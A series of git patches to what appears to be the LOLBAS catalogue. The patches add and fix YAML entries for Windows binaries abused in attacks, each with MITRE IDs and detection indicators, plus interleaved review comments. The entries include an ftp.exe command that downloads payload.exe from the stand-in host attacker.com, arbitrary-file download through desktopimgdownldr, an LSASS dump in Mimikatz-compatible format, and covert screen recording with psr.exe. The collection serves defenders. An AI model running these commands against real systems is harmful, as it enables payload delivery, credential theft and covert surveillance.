 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
+ Description: Download
+ Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+ OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
 - Path: C:\Windows\System32\ftp.exe
 - Path: C:\Windows\SysWOW64\ftp.exe
@@ -23,6 +31,7 @@ Resources:
 - Link: https://twitter.com/0xAmit/status/1070063130636640256
 - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
 - Link: https://ss64.com/nt/ftp.html
+ - Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
@@ -30,4 +39,4 @@ Acknowledgement:
 Handle: ''
 - Person: Amit Serper
 Handle: '@0xAmit '
----
\ No newline at end of file
+---
From 5de8d357b6d5419457ee312ad5a74e1cdace864a Mon Sep 17 00:00:00 2001
From: Maxime Nadeau
Date: Tue, 12 May 2020 16:24:49 -0400
Subject: [PATCH 27/96] Added ttdinject.exe
---
 yml/OSBinaries/ttdinject.yml | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 yml/OSBinaries/ttdinject.yml
diff --git a/yml/OSBinaries/ttdinject.yml b/yml/OSBinaries/ttdinject.yml
new file mode 100644
index 0000000..086e077
--- /dev/null
+++ b/yml/OSBinaries/ttdinject.yml
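Review bot: `Description: Download` says less than the entry's Usecase; `Description: Downloads a file with a scripted, non-interactive ftp.exe session driven by -s:` tells the reader what distinguishes this example from the interactive one above it. The Detection section, outside this hunk, has nothing for the variant; the `-s:` script-file switch visible in the command is the stable signal, e.g. `- IOC: ftp.exe started with -s: pointing at a script file written moments earlier`.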
@@ -0,0 +1,30 @@
+---
+Name: ttdinject.exe
+Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
+Author: 'Maxime Nadeau'
+Created: '2020-05-12'
+Commands:
+ - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
+ Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
+ Usecase: Spawn process using other binary
+ Category: Execute
+ Privileges: Administrator
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows 10 1809 and newer
+Full_Path:
+ - Path: C:\Windows\System32\ttdinject.exe
+ - Path: C:\Windows\Syswow64\ttdinject.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC: Event ID 10
+ - IOC: binary.exe spawned
+Resources:
+ - Link: https://twitter.com/Oddvarmoe/status/1196333160470138880
+Acknowledgement:
+ - Person: Oddvar Moe
+ Handle: @oddvarmoe
+ - Person: Maxime Nadeau
+ Handle: @m_nad0
+---
From b8b265b397c86942b9a3530580c849cbd7d4d7bb Mon Sep 17 00:00:00 2001
From: Maxime Nadeau
Date: Tue, 12 May 2020 16:31:47 -0400
Subject: [PATCH 28/96] Added ttdinject
---
 yml/OSBinaries/{ttdinject.yml => Ttdinject.yml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename yml/OSBinaries/{ttdinject.yml => Ttdinject.yml} (100%)
diff --git a/yml/OSBinaries/ttdinject.yml b/yml/OSBinaries/Ttdinject.yml
similarity index 100%
rename from yml/OSBinaries/ttdinject.yml
rename to yml/OSBinaries/Ttdinject.yml
From b95fb7ed2725e86606431eeaa14321576a768ba7 Mon Sep 17 00:00:00 2001
From: Maxime Nadeau
Date: Tue, 12 May 2020 16:40:49 -0400
Subject: [PATCH 29/96] Added the IOCs
---
 yml/OSBinaries/Ttdinject.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml
index 086e077..23630e8 100644
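Review bot: `Handle: @oddvarmoe` and `Handle: @m_nad0` are unquoted, and `@` is a reserved indicator in YAML that cannot start a plain scalar, so a strict parser rejects the whole file. Quote them as the other entries do: `Handle: '@oddvarmoe'` and `Handle: '@m_nad0'`.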
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@@ -18,8 +18,8 @@ Full_Path:
 Code_Sample:
 - Code:
 Detection:
- - IOC: Event ID 10
- - IOC: binary.exe spawned
+ - IOC: Parent child relationship. Ttdinject.exe parent for executed command
+ - IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process
 Resources:
 - Link: https://twitter.com/Oddvarmoe/status/1196333160470138880
 Acknowledgement:
From ae3d9b9b6bffd861e3f337f1611147c76005d782 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Cl=C3=A9ment=20Notin?=
Date: Mon, 15 Jun 2020 23:33:34 +0200
Subject: [PATCH 30/96] sqldumper: minor fix mis-typed words
---
 yml/OtherMSBinaries/Sqldumper.yml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml
index 2a0ccd6..723ec9d 100644
--- a/yml/OtherMSBinaries/Sqldumper.yml
+++ b/yml/OtherMSBinaries/Sqldumper.yml
@@ -6,15 +6,15 @@ Created: '2018-05-25'
 Commands:
 - Command: sqldumper.exe 464 0 0x0110
 Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).
- Usecase: Dump process uisng PID.
+ Usecase: Dump process using PID.
 Category: Dump
 Privileges: Administrator
 MitreID: T1003
 MitreLink: https://attack.mitre.org/wiki/Technique/T1003
 OperatingSystem: Windows
 - Command: sqldumper.exe 540 0 0x01100:40
- Description: 0x01100:40 flag will create a Mimikatz compatibile dump file.
- Usecase: Dump LSASS.exe to Mimikatz compatable dump uisng PID.
+ Description: 0x01100:40 flag will create a Mimikatz compatible dump file.
+ Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
 Category: Dump
 Privileges: Administrator
 MitreID: T1003
@@ -34,4 +34,4 @@ Resources:
 Acknowledgement:
 - Person: Luis Rocha
 Handle: '@countuponsec'
----
\ No newline at end of file
+---
From dec26ada2174e1cd8528b04539abfeec8a0a2205 Mon Sep 17 00:00:00 2001
From: JPMinty
Date: Wed, 24 Jun 2020 21:09:59 +0930
Subject: [PATCH 31/96] Create explorer.yml
---
 yml/OSBinaries/explorer.yml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 yml/OSBinaries/explorer.yml
diff --git a/yml/OSBinaries/explorer.yml b/yml/OSBinaries/explorer.yml
new file mode 100644
index 0000000..edebed6
--- /dev/null
+++ b/yml/OSBinaries/explorer.yml
@@ -0,0 +1,26 @@
+---
+Name: Explorer.exe
+Description: Binary used for managing files and system components within Windows
+Author: 'Jai Minton'
+Created: '2020-06-24'
+Commands:
+ - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
+ Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
+ Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+ - Path: C:\Windows\explorer.exe
+Code_Sample:
+- Code:
+Detection:
+ - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
+Resources:
+ - Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20
+Acknowledgement:
+ - Person: Jai Minton
+ Handle: '@CyberRaiju'
+---
\ No newline at end of file
From 663724523fffc86075539b9c791364ed896c9024 Mon Sep 17 00:00:00 2001
From: JPMinty
Date: Wed, 24 Jun 2020 21:15:40 +0930
Subject: [PATCH 32/96] Update explorer.yml
---
 yml/OSBinaries/explorer.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/yml/OSBinaries/explorer.yml b/yml/OSBinaries/explorer.yml
index edebed6..73ef496 100644
--- a/yml/OSBinaries/explorer.yml
+++ b/yml/OSBinaries/explorer.yml
@@ -14,6 +14,7 @@ Commands:
 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
 - Path: C:\Windows\explorer.exe
+ - Path: C:\Windows\SysWOW64\explorer.exe
 Code_Sample:
 - Code:
 Detection:
From cfb5fcdf24455592a9e7b35862b360d16ee889f2 Mon Sep 17 00:00:00 2001
From: Lemonada
Date: Sat, 27 Jun 2020 14:45:03 +0300
Subject: [PATCH 33/96] Create psr.yml Psr.exe can be used to take screenshots of a users sessions.
---
 Psr.yml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 Psr.yml
diff --git a/Psr.yml b/Psr.yml
new file mode 100644
index 0000000..8335fec
--- /dev/null
+++ b/Psr.yml
@@ -0,0 +1,28 @@
+---
+Name: Psr.exe
+Description: Windows Problem Steps Recorder, used to record screen and clicks.
+Author: Leon Rodenko
+Created: '2020-06-27
+Commands:
+ - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
+ Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
+ Usecase: Can be used to take screenshots of the user environment
+ Category: Reconnaissance
+ Privileges: User
+ MitreID: T1113
+ MitreLink: https://attack.mitre.org/techniques/T1113/
+ OperatingSystem: since Windows 7 (client) / Windows 2008 R2
+Full_Path:
+ - Path: c:\windows\system32\psr.exe
+ - Path: c:\windows\syswow64\psr.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC: psr.exe spawned
+ - IOC: suspicious activity when running with "/gui 0" flag
+Resources:
+ - Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx
+Acknowledgement:
+ - Person: Leon Rodenko
+ Handle: @L3m0nada
+---
From 48722da65c2e2e88469f1c37de52b30c5d2a0c5c Mon Sep 17 00:00:00 2001
From: Lemonada
Date: Sat, 27 Jun 2020 14:50:22 +0300
Subject: [PATCH 34/96] Delete Psr.yml
---
 Psr.yml | 28 ----------------------------
 1 file changed, 28 deletions(-)
 delete mode 100644 Psr.yml
diff --git a/Psr.yml b/Psr.yml
deleted file mode 100644
index 8335fec..0000000
--- a/Psr.yml
+++ /dev/null
@@ -1,28 +0,0 @@
----
-Name: Psr.exe
-Description: Windows Problem Steps Recorder, used to record screen and clicks.
-Author: Leon Rodenko
-Created: '2020-06-27
-Commands:
- - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
- Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
- Usecase: Can be used to take screenshots of the user environment
- Category: Reconnaissance
- Privileges: User
- MitreID: T1113
- MitreLink: https://attack.mitre.org/techniques/T1113/
- OperatingSystem: since Windows 7 (client) / Windows 2008 R2
-Full_Path:
- - Path: c:\windows\system32\psr.exe
- - Path: c:\windows\syswow64\psr.exe
-Code_Sample:
- - Code:
-Detection:
- - IOC: psr.exe spawned
- - IOC: suspicious activity when running with "/gui 0" flag
-Resources:
- - Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx
-Acknowledgement:
- - Person: Leon Rodenko
- Handle: @L3m0nada
----
From 2a5a4e391d5f2c3ead6dd0573b900a4dd73a9781 Mon Sep 17 00:00:00 2001
From: Lemonada
Date: Sat, 27 Jun 2020 14:51:07 +0300
Subject: [PATCH 35/96] Create Psr.yml take screenshots of user sessions
---
 yml/OSBinaries/Psr.yml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 yml/OSBinaries/Psr.yml
diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml
new file mode 100644
index 0000000..8335fec
--- /dev/null
+++ b/yml/OSBinaries/Psr.yml
@@ -0,0 +1,28 @@
+---
+Name: Psr.exe
+Description: Windows Problem Steps Recorder, used to record screen and clicks.
+Author: Leon Rodenko
+Created: '2020-06-27
+Commands:
+ - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
+ Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
+ Usecase: Can be used to take screenshots of the user environment
+ Category: Reconnaissance
+ Privileges: User
+ MitreID: T1113
+ MitreLink: https://attack.mitre.org/techniques/T1113/
+ OperatingSystem: since Windows 7 (client) / Windows 2008 R2
+Full_Path:
+ - Path: c:\windows\system32\psr.exe
+ - Path: c:\windows\syswow64\psr.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC: psr.exe spawned
+ - IOC: suspicious activity when running with "/gui 0" flag
+Resources:
+ - Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx
+Acknowledgement:
+ - Person: Leon Rodenko
+ Handle: @L3m0nada
+---
From fd01a9151a070dcf64f3f5e191785b39381b0ed5 Mon Sep 17 00:00:00 2001
From: Kristal-g
Date: Thu, 2 Jul 2020 20:46:05 +0300
Subject: [PATCH 36/96] Added desktopimgdownldr.exe
---
 yml/OSBinaries/desktopimgdownldr.yml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 yml/OSBinaries/desktopimgdownldr.yml
diff --git a/yml/OSBinaries/desktopimgdownldr.yml b/yml/OSBinaries/desktopimgdownldr.yml
new file mode 100644
index 0000000..4ce606c
--- /dev/null
+++ b/yml/OSBinaries/desktopimgdownldr.yml
@@ -0,0 +1,27 @@
+---
+Name: desktopimgdownldr.exe
+Description: Windows binary used to configure lockscreen/desktop image
+Author: Gal Kristal
+Created: 28/06/2020
+Commands:
+ - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
+ Description: Downloads the file and sets it as the computer's lockscreen
+ Usecase: Download arbitrary files from a web server
+ Category: Download
+ Privileges: User
+ MitreID: - T1105
+ MitreLink: - https://attack.mitre.org/techniques/T1105/
+ OperatingSystem: Windows 10
+Full_Path:
+ - Path: c:\windows\system32\desktopimgdownldr.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC: desktopimgdownldr.exe that creates non-image file
+ - IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
+Resources:
+ - Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
+Acknowledgement:
+ - Person: Gal Kristal
+ Handle: @gal_kristal
+---
\ No newline at end of file
From 794d3c04ccf1ecc172c2cb28338f99b00a057197 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Fri, 3 Jul 2020 14:03:51 +0200
Subject: [PATCH 37/96] Added Acknowledgement to rundll32
---
 yml/OSBinaries/Rundll32.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml
index d7f9f60..2b7c2b1 100644
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@@ -92,4 +92,6 @@ Acknowledgement:
 Handle: '@bohops'
 - Person: Sailay
 Handle: '@404death'
+ - Person: Martin Ingesen
+ Handle: '@Mrtn9'
 ---
From 416680941da09ef71a720d5d2400a187de52d78f Mon Sep 17 00:00:00 2001
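Review bot: The command's distinguishing feature is the `set "SYSTEMROOT=C:\Windows\Temp"` prefix, presumably there to redirect where the downloaded file is written, yet neither IOC mentions it; `- IOC: desktopimgdownldr.exe started with a SYSTEMROOT environment variable that does not point at the real Windows directory` is the signal specific to this technique, alongside the registry write already listed. `Created: 28/06/2020` should use the quoted ISO form of the sibling entries, `Created: '2020-06-28'`.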
From: Oddvar Moe
Date: Fri, 3 Jul 2020 14:52:29 +0200
Subject: [PATCH 38/96] Rename explorer.yml to Explorer.yml Changed capitalization
---
 yml/OSBinaries/{explorer.yml => Explorer.yml} | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename yml/OSBinaries/{explorer.yml => Explorer.yml} (99%)
diff --git a/yml/OSBinaries/explorer.yml b/yml/OSBinaries/Explorer.yml
similarity index 99%
rename from yml/OSBinaries/explorer.yml
rename to yml/OSBinaries/Explorer.yml
index 73ef496..35ea876 100644
--- a/yml/OSBinaries/explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
 - Person: Jai Minton
 Handle: '@CyberRaiju'
----
\ No newline at end of file
+---
From dac58c312fb604837e78edd3cc7312ff8564e40d Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Fri, 3 Jul 2020 14:59:50 +0200
Subject: [PATCH 39/96] Fixed some missing quotes and stuff on psr.exe
---
 yml/OSBinaries/Psr.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml
index 8335fec..4a37660 100644
--- a/yml/OSBinaries/Psr.yml
+++ b/yml/OSBinaries/Psr.yml
@@ -2,7 +2,7 @@
 Name: Psr.exe
 Description: Windows Problem Steps Recorder, used to record screen and clicks.
 Author: Leon Rodenko
-Created: '2020-06-27
+Created: '2020-06-27'
 Commands:
 - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
 Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
@@ -24,5 +24,5 @@ Resources:
 - Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx
 Acknowledgement:
 - Person: Leon Rodenko
- Handle: @L3m0nada
+ Handle: '@L3m0nada'
 ---
From 7dfbc7af6716aa41d3e7e3df5d1d9c92a42f9528 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Fri, 3 Jul 2020 15:04:09 +0200
Subject: [PATCH 40/96] Update and rename desktopimgdownldr.yml to Desktopimgdownldr.yml Changed capitalization
---
 .../{desktopimgdownldr.yml => Desktopimgdownldr.yml} | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
 rename yml/OSBinaries/{desktopimgdownldr.yml => Desktopimgdownldr.yml} (96%)
diff --git a/yml/OSBinaries/desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml
similarity index 96%
rename from yml/OSBinaries/desktopimgdownldr.yml
rename to yml/OSBinaries/Desktopimgdownldr.yml
index 4ce606c..8567569 100644
--- a/yml/OSBinaries/desktopimgdownldr.yml
+++ b/yml/OSBinaries/Desktopimgdownldr.yml
@@ -1,5 +1,5 @@
 ---
-Name: desktopimgdownldr.exe
+Name: Desktopimgdownldr.exe
 Description: Windows binary used to configure lockscreen/desktop image
 Author: Gal Kristal
 Created: 28/06/2020
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
 - Person: Gal Kristal
 Handle: @gal_kristal
----
\ No newline at end of file
+---
From 420860e5f7daec8e7213495f4afc2c68259404f4 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Fri, 3 Jul 2020 15:05:33 +0200
Subject: [PATCH 41/96] Adjusted some missing quotes and stuff on Dekstopimgdownldr
---
 yml/OSBinaries/Desktopimgdownldr.yml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml
index 8567569..97b2f85 100644
--- a/yml/OSBinaries/Desktopimgdownldr.yml
+++ b/yml/OSBinaries/Desktopimgdownldr.yml
@@ -9,8 +9,8 @@ Commands:
 Usecase: Download arbitrary files from a web server
 Category: Download
 Privileges: User
- MitreID: - T1105
- MitreLink: - https://attack.mitre.org/techniques/T1105/
+ MitreID: T1105
+ MitreLink: https://attack.mitre.org/techniques/T1105/
 OperatingSystem: Windows 10
 Full_Path:
 - Path: c:\windows\system32\desktopimgdownldr.exe
@@ -23,5 +23,5 @@ Resources:
 - Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
 Acknowledgement:
 - Person: Gal Kristal
- Handle: @gal_kristal
+ Handle: '@gal_kristal'
 ---
From cb3a45008ef39fe5c0c7c310146d3951eedf8d2c Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Fri, 3 Jul 2020 15:40:58 +0200
Subject: [PATCH 42/96] Added regini.exe writing to registry using ADS
---
 yml/OSBinaries/Regini.yml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 yml/OSBinaries/Regini.yml
diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml
new file mode 100644
index 0000000..ce20f4c
--- /dev/null
+++ b/yml/OSBinaries/Regini.yml
@@ -0,0 +1,27 @@
+---
+Name: Regini.exe
+Description: Used to manipulate the registry
+Author: 'Oddvar Moe'
+Created: '2020-07-03'
+Commands:
+ - Command: regini.exe newfile.txt:hidden.ini
+ Description: Write registry keys from data inside the Alternate data stream.
+ Usecase: Write to registry
+ Category: ADS
+ Privileges: User
+ MitreID: T1096
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+ - Path: C:\Windows\System32\regini.exe
+ - Path: C:\Windows\SysWOW64\regini.exe
+Code_Sample:
+- Code:
+Detection:
+ - IOC: regini.exe reading from ADS
+Resources:
+ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+Acknowledgement:
+ - Person: Eli Salem
+ Handle: '@elisalem9'
+---
\ No newline at end of file
From 17a34e27f60f0025346ab8c15a9073a144596779 Mon Sep 17 00:00:00 2001
From: bohops
Date: Fri, 3 Jul 2020 10:03:42 -0400
Subject: [PATCH 43/96] Added Twitter reference for use "in-the-wild"
---
 yml/OSScripts/Manage-bde.yml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml
index 8d98bef..86024e6 100644
--- a/yml/OSScripts/Manage-bde.yml
+++ b/yml/OSScripts/Manage-bde.yml
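Review bot: `- Code:` under `Code_Sample` in the new Regini.yml is an empty list item that parses as null, and it sits at column 0 while every other list item in the file is indented; either drop the section or give it a real sample. The single IOC, `regini.exe reading from ADS`, names no observable a defender can alert on; the command line itself is the signal, e.g. `- IOC: regini.exe command line whose script argument contains an NTFS stream separator (file:stream)`. `MitreID: T1096` was, as far as I know, folded into T1564.004 (NTFS File Attributes) when ATT&CK moved to sub-techniques, so the reference may need revisiting once the repo adopts the newer numbering.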
@@ -29,9 +29,12 @@ Detection: Resources: - Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 - Link: https://twitter.com/bohops/status/980659399495741441 + - Link: https://twitter.com/JohnLaTwC/status/1223292479270600706 Acknowledgement: - Person: Jimmy Handle: '@bohops' - Person: Daniel Bohannon Handle: '@danielbohannon' ---- \ No newline at end of file + - Person: John Lambert + - Handle: '@JohnLaTwC' +--- From 12cdb47285a8e74146b7826d7603de940ce3bfa3 Mon Sep 17 00:00:00 2001 From: bohops Date: Fri, 3 Jul 2020 10:07:18 -0400 Subject: [PATCH 44/96] Removed COM Hijack --- yml/OSScripts/Winrm.yml | 8 -------- 1 file changed, 8 deletions(-) diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 76bc036..d2ea85e 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -4,14 +4,6 @@ Description: Script used for manage Windows RM settings Author: 'Oddvar Moe' Created: '2018-05-25' Commands: - - Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig - Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1216 - MitreLink: https://attack.mitre.org/wiki/Technique/T1216 - OperatingSystem: Windows 10 - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol Usecase: Proxy execution From e316cb4842dd4e79630293546ba86c614985a765 Mon Sep 17 00:00:00 2001 From: bohops Date: Fri, 3 Jul 2020 10:15:06 -0400 Subject: [PATCH 45/96] Delete Slmgr - COM Hijacks are too broad --- yml/OSScripts/Slmgr.yml | 31 ------------------------------- 1 file changed, 31 deletions(-) delete mode 100644 yml/OSScripts/Slmgr.yml diff --git a/yml/OSScripts/Slmgr.yml b/yml/OSScripts/Slmgr.yml deleted file mode 100644 index 8f04c38..0000000 
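Review bot: `+ - Handle: '@JohnLaTwC'` makes the handle a separate list item (a mapping holding only a `Handle` key) instead of a field of the `John Lambert` entry, so name and handle no longer belong to the same object. It should be `Handle: '@JohnLaTwC'` indented under `- Person: John Lambert`, matching the two entries above it. A later commit in this series removes the stray dash.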
--- a/yml/OSScripts/Slmgr.yml +++ /dev/null @@ -1,31 +0,0 @@ ---- -Name: Slmgr.vbs -Description: Script used to manage windows license activation -Author: 'Oddvar Moe' -Created: '2018-05-25' -Commands: - - Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs - Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1216 - MitreLink: https://attack.mitre.org/wiki/Technique/T1216 - OperatingSystem: Windows 10 -Full_Path: - - Path: C:\Windows\System32\slmgr.vbs - - Path: C:\Windows\SysWOW64\slmgr.vbs -Code_Sample: - - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct - - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg -Detection: - - IOC: -Resources: - - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - - Link: https://www.youtube.com/watch?v=3gz1QmiMhss -Acknowledgement: - - Person: Matt Nelson - Handle: '@enigma0x3' - - Person: Casey Smith - Handle: '@subtee' ---- \ No newline at end of file From f1a7ad92dd00dd63fd9ef8aa0106e5212dbfcec4 Mon Sep 17 00:00:00 2001 From: bohops Date: Fri, 3 Jul 2020 10:24:34 -0400 Subject: [PATCH 46/96] Changed privilege level for registration --- yml/OSBinaries/Regsvcs.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index a89ca2e..d164ef2 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml 
@@ -8,7 +8,7 @@ Commands:
 Description: Loads the target .DLL file and executes the RegisterClass function.
 Usecase: Execute dll file and bypass Application whitelisting
 Category: Execute
- Privileges: User
+ Privileges: Local Admin
 MitreID: T1121
 MitreLink: https://attack.mitre.org/wiki/Technique/T1121
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@@ -34,4 +34,4 @@ Resources:
 Acknowledgement:
 - Person: Casey Smith
 Handle: '@subtee'
----
\ No newline at end of file
+---
From a976eaefe1c4eb1aab3bdc4888a6fc67bd8259f8 Mon Sep 17 00:00:00 2001
From: bohops
Date: Fri, 3 Jul 2020 10:35:01 -0400
Subject: [PATCH 47/96] Updated Mitre Reference - T1096
---
 yml/OSBinaries/Certutil.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml
index db1e9a8..11fc80d 100644
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@@ -25,8 +25,8 @@ Commands:
 Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
 Category: ADS
 Privileges: User
- MitreID: T1105
- MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+ MitreID: T1096
+ MitreLink: https://attack.mitre.org/techniques/T1096
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 - Command: certutil -encode inputFileName encodedOutputFileName
 Description: Command to encode a file using Base64
From 92f020b885c1009d79812bfd4e2e928eca9334c0 Mon Sep 17 00:00:00 2001
From: bohops
Date: Fri, 3 Jul 2020 14:56:06 -0400
Subject: [PATCH 48/96] Added dotnet msbuild awl bypass technique
---
 yml/OtherMSBinaries/Dotnet.yml | 11 +++++++++++
 1 file changed, 11 insertions(+)
diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml
index 5475947..59e1f31 100644
--- a/yml/OtherMSBinaries/Dotnet.yml
+++ b/yml/OtherMSBinaries/Dotnet.yml
